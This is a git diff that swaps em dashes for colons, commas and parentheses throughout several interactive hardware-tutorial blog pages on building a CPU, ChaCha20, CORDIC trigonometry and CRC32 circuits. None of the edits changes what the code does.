--- a/apps/web/src/features/blog/building-a-cpu/sections/AdderSection.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/AdderSection.tsx
@@ -18,8 +18,8 @@ export function AdderSection() {
           This is called a{' '}
           <strong className="text-gray-900 dark:text-white">ripple-carry adder</strong> because the
           carry &ldquo;ripples&rdquo; from the least significant bit to the most significant. The
-          6502 uses exactly this pattern, just wider &mdash; 8&nbsp;bits for its ALU, 16&nbsp;bits
-          for address arithmetic.
+          6502 uses exactly this pattern, just wider: 8&nbsp;bits for its ALU, 16&nbsp;bits for
+          address arithmetic.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Try it: set the <strong>A</strong> switches (a3&ndash;a0) to 0011 (3) and the{' '}

--- a/apps/web/src/features/blog/building-a-cpu/sections/CPU6502Section.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/CPU6502Section.tsx
@@ -22,15 +22,15 @@ export function CPU6502Section() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Everything we&rsquo;ve built &mdash; gates, adders, registers, counters, and an ALU
-          &mdash; are the building blocks of a real processor. The{' '}
+          Everything we&rsquo;ve built so far (gates, adders, registers, counters, and an ALU) makes
+          up the building blocks of a real processor. The{' '}
           <strong className="text-gray-900 dark:text-white">MOS 6502</strong> (1975) powered the
           Apple II, Commodore 64, and NES. It has just 3,510 transistors and an elegant instruction
           set. Its ALU is wider (8 bits), its program counter longer (16 bits), and it has a control
-          unit that decodes 56&nbsp;instructions &mdash; but the pieces are the same.
+          unit that decodes 56&nbsp;instructions, but the pieces are the same.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Below is a complete 6502 system simulated at the gate level &mdash; over 5,500 lines of
+          Below is a complete 6502 system simulated at the gate level: over 5,500 lines of
           TypeScript, compiled and running in your browser. It has a CPU, RAM, ROM, and a
           memory-mapped console output at address <code className="text-blue-300">$F000</code>.
         </p>
@@ -66,8 +66,8 @@ export function CPU6502Section() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The only difference between this 6502 and a modern CPU is scale: more transistors, wider
-          buses, deeper pipelines, more cache. But the fundamentals &mdash; NAND gates all the way
-          down &mdash; haven&rsquo;t changed.
+          buses, deeper pipelines, more cache. But the fundamentals, NAND gates all the way down,
+          haven&rsquo;t changed.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/building-a-cpu/sections/CompositionSection.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/CompositionSection.tsx
@@ -15,7 +15,7 @@ export function CompositionSection() {
           building blocks for even bigger ones.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Let&rsquo;s build an adder &mdash; the circuit that lets a CPU do math.
+          Let&rsquo;s build an adder, the circuit that lets a CPU do math.
         </p>
       </div>
 
@@ -26,7 +26,7 @@ export function CompositionSection() {
           <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
             Adds two single bits. The <strong>sum</strong> output is the XOR (are the bits
             different?), and the <strong>carry</strong> output is the AND (are both bits 1?). Try
-            it: 1+1 = 10 in binary &mdash; sum is 0, carry is 1.
+            it: 1+1 = 10 in binary, so sum is 0 and carry is 1.
           </p>
           <CircuitEmbed
             circuit={GATE_CIRCUITS.halfAdder.circuit}
@@ -55,8 +55,8 @@ export function CompositionSection() {
           <h3 className="text-lg font-semibold text-gray-900 dark:text-white mb-2">Multiplexer</h3>
           <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
             A data selector: the <strong>sel</strong> switch chooses which input (A or B) passes
-            through to the output. Muxes are everywhere in CPUs &mdash; they&rsquo;re how the
-            control unit routes data between components.
+            through to the output. Muxes are everywhere in CPUs: they&rsquo;re how the control unit
+            routes data between components.
           </p>
           <CircuitEmbed
             circuit={GATE_CIRCUITS.mux.circuit}

--- a/apps/web/src/features/blog/building-a-cpu/sections/CounterSection.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/CounterSection.tsx
@@ -13,7 +13,7 @@ export function CounterSection() {
           <strong className="text-gray-900 dark:text-white">counter</strong> uses flip-flops, NOT
           gates, XOR gates, and AND gates working together. Bit 0 always toggles. Bit 1 toggles when
           bit 0 is 1. Bit 2 toggles when bits 0 <em>and</em> 1 are both 1. The AND gates form a
-          carry chain &mdash; the same idea as addition.
+          carry chain, the same idea as addition.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Click <strong>Tick</strong> repeatedly or hit <strong>Auto</strong> to watch it count. The
@@ -21,9 +21,9 @@ export function CounterSection() {
           wraps around.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          A program counter in a CPU works just like this &mdash; it counts through memory
-          addresses, fetching one instruction at a time. The only difference is width (16 bits for
-          the 6502) and the ability to load a new value (for jumps and branches).
+          A program counter in a CPU works just like this: it counts through memory addresses,
+          fetching one instruction at a time. The only difference is width (16 bits for the 6502)
+          and the ability to load a new value (for jumps and branches).
         </p>
       </div>
 

--- a/apps/web/src/features/blog/building-a-cpu/sections/GatesSection.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/GatesSection.tsx
@@ -9,8 +9,8 @@ export function GatesSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Every computer ever built &mdash; from the Apollo Guidance Computer to the M4 chip in your
-          MacBook &mdash; can be constructed from a single type of logic gate:{' '}
+          Every computer ever built, from the Apollo Guidance Computer to the M4 chip in your
+          MacBook, can be constructed from a single type of logic gate:{' '}
           <strong className="text-gray-900 dark:text-white">NAND</strong>.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
@@ -28,7 +28,7 @@ export function GatesSection() {
         {/* NOT Gate */}
         <div>
           <h3 className="text-lg font-semibold text-gray-900 dark:text-white mb-2">
-            NOT &mdash; The Inverter
+            NOT: The Inverter
           </h3>
           <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
             Wire both NAND inputs together. When the input is 1, both NAND inputs are 1, so the
@@ -72,11 +72,11 @@ export function GatesSection() {
         {/* XOR Gate */}
         <div>
           <h3 className="text-lg font-semibold text-gray-900 dark:text-white mb-2">
-            XOR &mdash; Exclusive OR
+            XOR: Exclusive OR
           </h3>
           <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
-            The &ldquo;difference detector&rdquo; &mdash; outputs 1 only when inputs are{' '}
-            <em>different</em>. Built from 4 NAND gates. This one is essential for arithmetic.
+            The &ldquo;difference detector&rdquo;: outputs 1 only when inputs are <em>different</em>
+            . Built from 4 NAND gates. This one is essential for arithmetic.
           </p>
           <CircuitEmbed
             circuit={GATE_CIRCUITS.xor.circuit}

--- a/apps/web/src/features/blog/building-a-cpu/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/HeroSection.tsx
@@ -6,9 +6,9 @@ export function HeroSection() {
           Building a CPU from Scratch
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
-          From a single NAND gate to a working 6502 processor running C code &mdash; every circuit
-          is live and interactive. Click the switches. Watch the signals propagate. Build intuition
-          for how computers actually work.
+          From a single NAND gate to a working 6502 processor running C code. Every circuit is live
+          and interactive. Click the switches. Watch the signals propagate. Build intuition for how
+          computers actually work.
         </p>
         <div className="mt-8 flex items-center gap-4 text-sm text-gray-500 dark:text-gray-400">
           <span>Interactive tutorial</span>

--- a/apps/web/src/features/blog/building-a-cpu/sections/MemorySection.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/MemorySection.tsx
@@ -10,10 +10,9 @@ export function MemorySection() {
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Everything so far has been{' '}
-          <strong className="text-gray-900 dark:text-white">combinational</strong> &mdash; the
-          outputs depend only on the current inputs. But a computer needs to <em>remember</em>{' '}
-          things. To store a bit, we need feedback: a circuit whose output connects back to its own
-          input.
+          <strong className="text-gray-900 dark:text-white">combinational</strong>: the outputs
+          depend only on the current inputs. But a computer needs to <em>remember</em> things. To
+          store a bit, we need feedback: a circuit whose output connects back to its own input.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           This is where the <strong className="text-gray-900 dark:text-white">clock</strong> enters
@@ -29,7 +28,7 @@ export function MemorySection() {
           <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
             The simplest memory cell: two NOR gates cross-coupled. Toggle <strong>S</strong> (Set)
             to store a 1, toggle <strong>R</strong> (Reset) to clear it. Notice how the output{' '}
-            <em>stays</em> after you release the input &mdash; that&rsquo;s memory!
+            <em>stays</em> after you release the input. That&rsquo;s memory!
           </p>
           <CircuitEmbed
             circuit={BLOG_CIRCUITS.srLatch.circuit}
@@ -62,7 +61,7 @@ export function MemorySection() {
           <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
             Four D flip-flops in parallel, sharing a clock. Set some switches, click{' '}
             <strong>Tick</strong>, and the register captures all four bits at once. This is exactly
-            how CPU registers work &mdash; just wider (8, 16, 32, or 64 bits).
+            how CPU registers work, just wider (8, 16, 32, or 64 bits).
           </p>
           <CircuitEmbed
             circuit={BLOG_CIRCUITS.register4bit.circuit}

--- a/apps/web/src/features/blog/building-a-cpu/sections/RAMSection.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/RAMSection.tsx
@@ -10,9 +10,9 @@ export function RAMSection() {
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Registers store a few values. A CPU needs <em>thousands</em> of addressable bytes.
-          That&rsquo;s <strong className="text-gray-900 dark:text-white">RAM</strong> &mdash; an
-          array of memory cells, each with an address. You put an address on the bus and the data at
-          that address appears on the output.
+          That&rsquo;s <strong className="text-gray-900 dark:text-white">RAM</strong>: an array of
+          memory cells, each with an address. You put an address on the bus and the data at that
+          address appears on the output.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The key insight:{' '}
@@ -27,7 +27,7 @@ export function RAMSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Try it: write the value 42 to address 1, then write 7 to address 2. Switch between
           addresses to see both values are remembered. The 6502 has 2&nbsp;KB of RAM wired to its
-          address bus &mdash; same idea, just 2,048 locations instead of 256.
+          address bus: same idea, just 2,048 locations instead of 256.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/building-a-cpu/use6502Simulator.ts
+++ b/apps/web/src/features/blog/building-a-cpu/use6502Simulator.ts
@@ -36,7 +36,7 @@ export const PROGRAMS: Program[] = [
 
 /**
  * Convert a binary ROM file (Uint8Array) into the initialMemory format.
- * The ROM binary maps to addresses starting at 0 — the simulator's ROM nodes
+ * The ROM binary maps to addresses starting at 0, and the simulator's ROM nodes
  * (matched by "rom" substring) receive this data.
  */
 function romToMemoryMap(data: Uint8Array): Map<string, Map<number, number>> {

--- a/apps/web/src/features/blog/chacha20-in-hardware/sections/ARXSection.tsx
+++ b/apps/web/src/features/blog/chacha20-in-hardware/sections/ARXSection.tsx
@@ -11,20 +11,20 @@ export function ARXSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          ChaCha20 belongs to a family of ciphers called <strong>ARX</strong> &mdash; built entirely
-          from <strong>A</strong>ddition, <strong>R</strong>otation, and <strong>X</strong>OR. No
+          ChaCha20 belongs to a family of ciphers called <strong>ARX</strong>, built entirely from{' '}
+          <strong>A</strong>ddition, <strong>R</strong>otation, and <strong>X</strong>OR. No
           S-boxes, no lookup tables, no multiplication. This makes it extremely fast in software{' '}
           <em>and</em> cheap in hardware.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          <strong>ADD</strong> mixes bits by carrying &mdash; a change in one bit can cascade
-          through the entire word. <strong>XOR</strong> mixes bits independently without carries.
-          Together, they create both local and non-local diffusion across the 32-bit word.
+          <strong>ADD</strong> mixes bits by carrying, so a change in one bit can cascade through
+          the entire word. <strong>XOR</strong> mixes bits independently without carries. Together,
+          they create both local and non-local diffusion across the 32-bit word.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Try changing the input values below (decimal). The <code>Adder</code> produces a modular
           sum (wrapping at 2<sup>32</sup>), while <code>BusXor</code> flips bits independently.
-          Notice how the outputs are shown in hex &mdash; the same 32 bits, just a more convenient
+          Notice how the outputs are shown in hex, the same 32 bits, just a more convenient
           representation at this scale.
         </p>
       </div>

--- a/apps/web/src/features/blog/chacha20-in-hardware/sections/BigPictureSection.tsx
+++ b/apps/web/src/features/blog/chacha20-in-hardware/sections/BigPictureSection.tsx
@@ -6,8 +6,8 @@ export function BigPictureSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          A full ChaCha20 block operates on a 4&times;4 matrix of 32-bit words &mdash; 512 bits of
-          state. The matrix is initialized with four constants, an eight-word key, a counter, and a
+          A full ChaCha20 block operates on a 4&times;4 matrix of 32-bit words, 512 bits of state.
+          The matrix is initialized with four constants, an eight-word key, a counter, and a
           three-word nonce:
         </p>
         <pre className="bg-gray-100 dark:bg-gray-900/80 border border-gray-700/50 rounded-lg p-4 text-sm font-mono text-gray-200 overflow-x-auto">
@@ -31,46 +31,45 @@ QR(2, 7,  8, 13)  QR(3, 4,  9, 14)`}
         </pre>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Ten double-rounds (20 rounds total, 80 quarter-rounds) produce the final state. The
-          original input is added back word-by-word &mdash; this makes the function non-invertible,
-          a critical property for a stream cipher.
+          original input is added back word-by-word, which makes the function non-invertible, a
+          critical property for a stream cipher.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The quarter-round you built above is the <strong>only non-trivial building block</strong>.
-          The rest is just wiring &mdash; choosing which four words from the matrix to feed into
-          each QR call. In an ASIC or FPGA, you&rsquo;d instantiate 4 quarter-round blocks and
-          pipeline them across 20 cycles, or unroll all 80 for single-cycle throughput at the cost
-          of area.
+          The rest is just wiring: choosing which four words from the matrix to feed into each QR
+          call. In an ASIC or FPGA, you&rsquo;d instantiate 4 quarter-round blocks and pipeline them
+          across 20 cycles, or unroll all 80 for single-cycle throughput at the cost of area.
         </p>
 
         <div className="rounded-lg border border-gray-700/50 bg-gray-100/50 dark:bg-gray-900/50 p-5">
           <h3 className="text-lg font-semibold text-gray-900 dark:text-white mb-3">
-            Designed to Avoid Hardware — Elegant in Hardware Anyway
+            Designed to Avoid Hardware, Elegant in Hardware Anyway
           </h3>
           <p className="text-gray-600 dark:text-gray-300 text-sm leading-relaxed">
             Daniel Bernstein designed ChaCha20 in 2008 with a specific goal: a cipher that would be
             fast <em>without</em> dedicated hardware support. AES had just been blessed with AES-NI
-            instructions on x86, but most of the world&rsquo;s devices &mdash; mobile phones, IoT
-            chips, older ARM cores &mdash; had no such luxury. ChaCha20&rsquo;s ARX primitives (add,
-            rotate, XOR) map to cheap, universally available instructions on any architecture, with
-            no lookup tables and no timing side channels. That&rsquo;s why Cloudflare and others
-            adopted ChaCha20-Poly1305 for TLS: it&rsquo;s the cipher that works fast in software on
+            instructions on x86, but most of the world&rsquo;s devices (mobile phones, IoT chips,
+            older ARM cores) had no such luxury. ChaCha20&rsquo;s ARX primitives (add, rotate, XOR)
+            map to cheap, universally available instructions on any architecture, with no lookup
+            tables and no timing side channels. That&rsquo;s why Cloudflare and others adopted
+            ChaCha20-Poly1305 for TLS: it&rsquo;s the cipher that works fast in software on
             anything.
           </p>
           <p className="text-gray-600 dark:text-gray-300 text-sm leading-relaxed mt-3">
             The interesting irony is what happens when you <em>do</em> put it in hardware anyway.
-            The same simplicity that makes ChaCha20 fast in software &mdash; just three operations,
-            repeated 80 times &mdash; turns out to make it unusually elegant in gates. Four adders,
-            four XOR trees, four barrel shifters: that&rsquo;s the entire datapath. A cipher
-            designed to escape the need for specialized hardware turns out to synthesize into some
-            of the cleanest silicon you can build.
+            The same simplicity that makes ChaCha20 fast in software, just three operations repeated
+            80 times, turns out to make it unusually elegant in gates. Four adders, four XOR trees,
+            four barrel shifters: that&rsquo;s the entire datapath. A cipher designed to escape the
+            need for specialized hardware turns out to synthesize into some of the cleanest silicon
+            you can build.
           </p>
         </div>
 
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          For comparison, AES was built for hardware from day one &mdash; and one round of AES
-          requires a 256-entry lookup table (the S-box), Galois field multiplication, and multiple
-          XOR trees just for the MixColumns step. That complexity is exactly why Intel had to build
-          AES-NI into the CPU: without dedicated silicon, AES is slow
+          For comparison, AES was built for hardware from day one, and one round of AES requires a
+          256-entry lookup table (the S-box), Galois field multiplication, and multiple XOR trees
+          just for the MixColumns step. That complexity is exactly why Intel had to build AES-NI
+          into the CPU: without dedicated silicon, AES is slow
           <em> and</em> vulnerable to cache-timing attacks. ChaCha20 has no such baggage.
         </p>
       </div>

--- a/apps/web/src/features/blog/chacha20-in-hardware/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/chacha20-in-hardware/sections/HeroSection.tsx
@@ -7,8 +7,8 @@ export function HeroSection() {
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
           AES needs dedicated CPU instructions to run fast. ChaCha20 was designed to need nothing
-          special &mdash; just addition, XOR, and bit rotation, repeated 80 times, on any hardware
-          that exists. The irony: that simplicity makes it unusually elegant in silicon too.
+          special: just addition, XOR, and bit rotation, repeated 80 times, on any hardware that
+          exists. The irony: that simplicity makes it unusually elegant in silicon too.
         </p>
         <p className="mt-4 text-gray-500 dark:text-gray-400 leading-relaxed">
           Build the core quarter-round from logic gates, verify it against the RFC 7539 test vector,

--- a/apps/web/src/features/blog/chacha20-in-hardware/sections/QuarterRoundSection.tsx
+++ b/apps/web/src/features/blog/chacha20-in-hardware/sections/QuarterRoundSection.tsx
@@ -21,9 +21,9 @@ a += b;  d ^= a;  d <<<= 8;
 c += d;  b ^= c;  b <<<= 7;`}
         </pre>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Notice how each step feeds the next &mdash; step 1 modifies <code>a</code> and{' '}
-          <code>d</code>, step 2 uses the new <code>d</code> to modify <code>c</code> and{' '}
-          <code>b</code>, and so on. By the end, every input bit has influenced every output bit.
+          Notice how each step feeds the next: step 1 modifies <code>a</code> and <code>d</code>,
+          step 2 uses the new <code>d</code> to modify <code>c</code> and <code>b</code>, and so on.
+          By the end, every input bit has influenced every output bit.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The circuit below is loaded with the{' '}
@@ -35,7 +35,7 @@ c += d;  b ^= c;  b <<<= 7;`}
           >
             RFC 7539 test vector
           </a>
-          . Change any input and the four output hex displays update instantly &mdash; this entire
+          . Change any input and the four output hex displays update instantly, because this entire
           circuit is pure combinational logic, computed in a single propagation with zero clock
           cycles.
         </p>

--- a/apps/web/src/features/blog/chacha20-in-hardware/sections/RotateSection.tsx
+++ b/apps/web/src/features/blog/chacha20-in-hardware/sections/RotateSection.tsx
@@ -12,18 +12,18 @@ export function RotateSection() {
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The third operation is left bit-rotation. In software,{' '}
-          <code>(x &lt;&lt; n) | (x &gt;&gt; (32-n))</code>. In hardware, it&rsquo;s even simpler
-          &mdash; you just rewire the bits. No gates, no delay, no power consumption. It&rsquo;s
-          literally free.
+          <code>(x &lt;&lt; n) | (x &gt;&gt; (32-n))</code>. In hardware, it&rsquo;s even simpler:
+          you just rewire the bits. No gates, no delay, no power consumption. It&rsquo;s literally
+          free.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Rotation moves high bits to low positions and low bits to high positions, ensuring that
           the carry diffusion from addition spreads across the entire word. ChaCha20 uses four
-          specific rotation amounts &mdash; 16, 12, 8, and 7 &mdash; carefully chosen to maximize
-          diffusion after just a few rounds.
+          specific rotation amounts (16, 12, 8, and 7), carefully chosen to maximize diffusion after
+          just a few rounds.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Try changing the input value below (decimal). Start with <strong>1</strong> &mdash;{' '}
+          Try changing the input value below (decimal). Start with <strong>1</strong>:{' '}
           <code>RotateLeft16</code> will output 65536 (bit 0 moved to position 16), and{' '}
           <code>RotateLeft7</code> will output 128 (bit 0 moved to position 7). You can watch a
           single bit travel to its new position.

--- a/apps/web/src/features/blog/chacha20-in-hardware/sections/StepSection.tsx
+++ b/apps/web/src/features/blog/chacha20-in-hardware/sections/StepSection.tsx
@@ -21,8 +21,8 @@ d <<<= 16; // rotate d left by 16`}
         </pre>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The addition creates carry-chain diffusion. The XOR mixes that result into <code>d</code>.
-          The rotation spreads the mixed bits across the entire word. One step alone is weak &mdash;
-          but four steps, repeated across 20 rounds, make the output indistinguishable from random.
+          The rotation spreads the mixed bits across the entire word. One step alone is weak, but
+          four steps, repeated across 20 rounds, make the output indistinguishable from random.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           In the circuit below, follow the data flow from left to right: the <code>Adder</code>{' '}

--- a/apps/web/src/features/blog/computing-trig-in-hardware/CORDICDemo.tsx
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/CORDICDemo.tsx
@@ -81,7 +81,7 @@ export function CORDICDemo() {
             </div>
             {isDone && (
               <span className="ml-auto text-xs font-medium text-green-400 bg-green-900/30 px-2 py-1 rounded">
-                Done &mdash; cos&thinsp;&asymp;&thinsp;{getDisplayValue('x')},
+                Done &middot; cos&thinsp;&asymp;&thinsp;{getDisplayValue('x')},
                 sin&thinsp;&asymp;&thinsp;{getDisplayValue('y')}
               </span>
             )}

--- a/apps/web/src/features/blog/computing-trig-in-hardware/circuits.ts
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/circuits.ts
@@ -215,7 +215,7 @@ export const CORDIC_CIRCUITS: Record<string, BlogCircuit> = {
 };
 
 /**
- * Inner CORDIC iteration logic — pure combinational.
+ * Inner CORDIC iteration logic: pure combinational.
  *
  * Takes the current (x, y, z, iter) and produces the next-cycle values plus
  * a write_enable signal (active while iter < 8) and a done flag (iter == 8).
@@ -376,7 +376,7 @@ const CORDICStep = circuit('CORDICStep', {
 });
 
 /**
- * Full CORDIC circuit — computes sin/cos by rotating a vector using only shifts and adds.
+ * Full CORDIC circuit: computes sin/cos by rotating a vector using only shifts and adds.
  * Starts at (80, 0) pointing right and rotates 45 degrees.
  * Expected result: x ~ y ~ 93 after 8 iterations.
  *

--- a/apps/web/src/features/blog/computing-trig-in-hardware/sections/CORDICSection.tsx
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/sections/CORDICSection.tsx
@@ -22,16 +22,15 @@ export function CORDICSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Everything we&rsquo;ve built &mdash; right shifters, signed arithmetic, direction
-          detection, iteration control, and the angle lookup table &mdash; comes together in one
-          circuit. The full{' '}
+          Everything we&rsquo;ve built (right shifters, signed arithmetic, direction detection,
+          iteration control, and the angle lookup table) comes together in one circuit. The full{' '}
           <strong className="text-gray-900 dark:text-white">CORDICIteration</strong> engine starts
           with a vector (80,&nbsp;0) pointing right and rotates it 45&deg;.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Click <strong>Run</strong> or step through the iterations one by one. Watch x decrease and
           y increase as the vector rotates. After 8 iterations, both x and y should be approximately
-          equal &mdash; confirming that cos(45&deg;) &asymp; sin(45&deg;).
+          equal, confirming that cos(45&deg;) &asymp; sin(45&deg;).
         </p>
       </div>
 
@@ -47,13 +46,13 @@ export function CORDICSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The final values are scaled by the CORDIC gain factor (K&nbsp;&asymp;&nbsp;1.647), so the
           raw outputs are larger than the true sine and cosine. In production hardware, a single
-          constant multiplication at the end corrects for this. But the core computation &mdash; 8
-          iterations of shift-and-add &mdash; runs with zero multipliers.
+          constant multiplication at the end corrects for this. But the core computation, 8
+          iterations of shift-and-add, runs with zero multipliers.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           This is the same algorithm inside your scientific calculator, the trigonometric units of
           early GPUs, and every DSP chip that needs fast angle computation. No Taylor series, no
-          lookup table interpolation &mdash; just wires, registers, and a shifter.
+          lookup table interpolation. Just wires, registers, and a shifter.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/computing-trig-in-hardware/sections/DirectionSection.tsx
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/sections/DirectionSection.tsx
@@ -17,8 +17,8 @@ export function DirectionSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           A <code>SignedComparator</code> checks whether z &ge; 0 and drives a <code>Mux</code> that
-          selects between addition and subtraction. Try setting the angle input to different values
-          &mdash; values above 127 are treated as negative in signed 8-bit arithmetic.
+          selects between addition and subtraction. Try setting the angle input to different values:
+          values above 127 are treated as negative in signed 8-bit arithmetic.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/computing-trig-in-hardware/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/sections/HeroSection.tsx
@@ -6,9 +6,9 @@ export function HeroSection() {
           Computing Trig in Hardware
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
-          Every calculator, GPU, and DSP chip computes sine and cosine without a multiplier &mdash;
-          using an algorithm called CORDIC that needs nothing more than bit shifts and addition.
-          Build one from logic gates and watch it converge in your browser.
+          Every calculator, GPU, and DSP chip computes sine and cosine without a multiplier, using
+          an algorithm called CORDIC that needs nothing more than bit shifts and addition. Build one
+          from logic gates and watch it converge in your browser.
         </p>
         <div className="mt-8 flex items-center gap-4 text-sm text-gray-500 dark:text-gray-400">
           <span>Interactive tutorial</span>

--- a/apps/web/src/features/blog/computing-trig-in-hardware/sections/IterationSection.tsx
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/sections/IterationSection.tsx
@@ -9,7 +9,7 @@ export function IterationSection() {
       <h2 className="text-3xl font-bold text-gray-900 dark:text-white mb-4">Counting Iterations</h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          CORDIC converges quickly &mdash; each iteration adds about one bit of precision. For our
+          CORDIC converges quickly, and each iteration adds about one bit of precision. For our
           8-bit values, 8 iterations are enough. A <code>Register</code> counts from 0 to 7, an{' '}
           <code>Incrementer</code> bumps it each tick, and a <code>Comparator</code> disables the
           write enable when the count reaches 8.

--- a/apps/web/src/features/blog/computing-trig-in-hardware/sections/RotationSection.tsx
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/sections/RotationSection.tsx
@@ -18,7 +18,7 @@ export function RotationSection() {
 y_next = y + (x >> iteration)`}
         </pre>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          That&rsquo;s it &mdash; a shift and an add for each coordinate. Subtraction is done in
+          That&rsquo;s it: a shift and an add for each coordinate. Subtraction is done in
           two&rsquo;s complement: invert all bits with a <code>BusNot</code>, then add 1 via the
           carry input of a <code>SignedAdder</code>. The circuit below computes both{' '}
           <strong>x &minus; (y &gt;&gt; shift)</strong> and <strong>x + (y &gt;&gt; shift)</strong>{' '}

--- a/apps/web/src/features/blog/computing-trig-in-hardware/sections/ShiftSection.tsx
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/sections/ShiftSection.tsx
@@ -14,7 +14,7 @@ export function ShiftSection() {
           The key insight behind CORDIC is that you never need to multiply or divide. Shifting a
           binary number right by <em>n</em> positions is the same as dividing by 2<sup>n</sup>.
           Shift right by 1 and you divide by 2. Shift by 3 and you divide by 8. Hardware can do this
-          in a single gate delay &mdash; it just rewires the bits.
+          in a single gate delay, because it just rewires the bits.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Try changing the <strong>value</strong> and <strong>shift</strong> inputs below. The{' '}

--- a/apps/web/src/features/blog/computing-trig-in-hardware/useCORDICSimulator.ts
+++ b/apps/web/src/features/blog/computing-trig-in-hardware/useCORDICSimulator.ts
@@ -10,7 +10,7 @@ export function useCORDICSimulator() {
   const [isDone, setIsDone] = useState(false);
 
   // Monitor the circuit's formal `done` output port (was previously a
-  // substring scan over portValues looking for a node named "doneLed" —
+  // substring scan over portValues looking for a node named "doneLed",
   // replaced with a declared top-level port).
   useEffect(() => {
     const done = sim.portValues?.get('__top__.done');

--- a/apps/web/src/features/blog/crc32-in-hardware/circuits.ts
+++ b/apps/web/src/features/blog/crc32-in-hardware/circuits.ts
@@ -27,7 +27,7 @@ export const LFSR4 = circuit('LFSR4', {
     led3: Led,
   },
   connect: ({ nodes: { ff0, ff1, ff2, ff3, feedback, led0, led1, led2, led3 } }) => [
-    // Feedback: XOR of MSB (ff3) and LSB (ff0) — polynomial x^4 + x + 1
+    // Feedback: XOR of MSB (ff3) and LSB (ff0), polynomial x^4 + x + 1
     ff3.q.to(feedback.a),
     ff0.q.to(feedback.b),
     // The feedback output feeds ff0's next state
@@ -53,7 +53,7 @@ export const CRC32Step = circuit('CRC32Step', {
   outputs: { crc_lo: bus(8), crc_hi: bus(8), crc_b2: bus(8), crc_b3: bus(8) },
   meta: { description: 'Process one byte through CRC-32 (Ethernet polynomial 0xEDB88320)' },
   eval: ({ crc, data }) => {
-    // Full 32-bit CRC step — we receive only the low 8 bits of crc here
+    // Full 32-bit CRC step; we receive only the low 8 bits of crc here
     // (the register passes one byte at a time in the demo circuit).
     // For the demo, we do the full 8-bit polynomial step on the low byte.
